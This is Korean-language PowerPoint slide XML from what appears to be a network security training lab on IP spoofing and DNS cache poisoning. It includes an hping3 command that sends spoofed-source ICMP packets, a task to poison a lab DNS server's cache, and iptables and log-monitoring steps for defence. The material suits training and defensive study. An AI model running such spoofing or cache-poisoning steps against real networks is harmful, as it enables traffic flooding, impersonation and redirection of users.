              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # hping3 –a 192.168.99.11 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –d 100 10.10.1.101</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2. Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.99.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 패킷이 나가는지 확인</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7" name="_x197186992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F798C4-9547-4C81-837C-47E9F30215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984" y="943233"/>
            <a:ext cx="5400675" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4099" name="_x197192032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4955B429-37DD-42D9-9F37-B585ADCC38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984" y="2431868"/>
            <a:ext cx="5400675" cy="232092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36A681B-7B62-4DF6-B54B-133E044543EF}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="_x197192112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25F164B-9269-498B-B06F-55D47B03D4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3524" y="943233"/>
            <a:ext cx="3946525"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0171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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Setup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180" y="2584448"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5121" name="_x197188192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FCA90A-682C-45B5-9784-F4332E2470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180" y="934995"/>
            <a:ext cx="5400675" cy="904875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22CAD37-D98B-4716-8D1A-B5AD6A94AFCE}"/>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9323579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/Training/Unit/Net/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. IP Spoofing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공격자가 현재 서버를 대상으로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ICMP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플러딩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시도하고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식별하여 방화벽으로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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>스푸핑</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 공격을 수행할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IP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FD9CA133-CDC3-42B0-8A32-4B3B8D6A50F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3488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err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</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err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 확인</a:t>
            </a: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3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart</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145" name="_x197190112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635AA4A-42BE-4713-8D61-6772DBCDB1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79622"/>
            <a:ext cx="5400675" cy="3643313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6147" name="_x197190192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2A8B92-7AFA-4DAF-80B5-1C187FC17A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146" y="679622"/>
            <a:ext cx="5400675" cy="3698875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6149" name="_x197189472">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4338795-C9B2-4338-8BED-76AA97A872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4984484"/>
            <a:ext cx="5295900" cy="449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55728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iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정</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sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/iptables</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956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iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정한 값을 적용하기 위해 서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service iptables restart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실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>되는 패킷을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># tail –f /var/log/message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7169" name="_x197190032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA0C41A-5B19-4DF4-BF64-A7218AEDD5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984" y="910281"/>
            <a:ext cx="3573463" cy="160338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171" name="_x197188592">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2408CFBA-BA48-420E-8CFA-FB6F9E82CA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180" y="1135933"/>
            <a:ext cx="5400675" cy="4418013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7173" name="_x197191152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DFA826-4DDC-45BE-9B15-1CCB6D342F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5757" y="933300"/>
            <a:ext cx="5326063" cy="350838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7175" name="_x197191152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3A566C9-EA6C-4436-9FD6-CCE738E6B9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6" y="2023533"/>
            <a:ext cx="5400675" cy="302577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F30512B-1FD6-4022-AA7E-A2FEDB1B8E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="5303756"/>
            <a:ext cx="5616792" cy="1185241"/>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check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7177" name="_x197191792">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A45113-677B-4426-9605-56BCF540D8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65757" y="5575184"/>
            <a:ext cx="3246438" cy="427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103719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/Training/Unit/Net/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 11. DNS Spoofing</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10.10.1.14</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서버가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취약한 것으로 보인다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서버 대상으로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Spoofing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서버의 캐시를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오염시키시오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도메인에 대한 네임 서버를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DNS Cache Poisoning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공격에 대응할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Lubuntu</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7958413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패킷 캡처 도구인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 패킷 캡처 시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Application -&gt; 09 – Sniffing &amp; Spoofing -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>선택</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eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>더블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a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 보내는 쿼리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 확인하기 위하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 일부 호스트의 주소 조회</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> www.navy.ac.kr 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.14 www.navy.ac.kr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3" name="_x48552432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F2CEAC-A054-4028-9C6C-02F4767B10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5146" y="926756"/>
            <a:ext cx="3411538" cy="2989263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="_x197189632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064748F7-B3EE-4002-BEEE-371CF25FDF3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44" t="15539" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1350586" y="4333103"/>
            <a:ext cx="3699863" cy="2050098"/>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197190272">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F48267-B84B-4D61-B29B-A4EF960150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b="52316"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7900086" y="1338649"/>
            <a:ext cx="2403475" cy="928688"/>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197189632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D839C98-B0AF-4E88-B2F1-A98E8D9DF1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b="58638"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6967378" y="2412204"/>
            <a:ext cx="4362450" cy="203358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표 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8643CADF-ABB5-484B-9E24-87FFB6DEB086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326482925"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6320247" y="4594322"/>
          <a:ext cx="5328158" cy="736600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3611293521"/>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FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주의</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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4465211"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="167640" marR="0" indent="-167640" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>※ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>오염시킬 호스트에 미리 접속하면</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>실제 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주소가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>서버에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>캐싱되므로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격을 성공시킬 수 없음</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>!</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6375248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
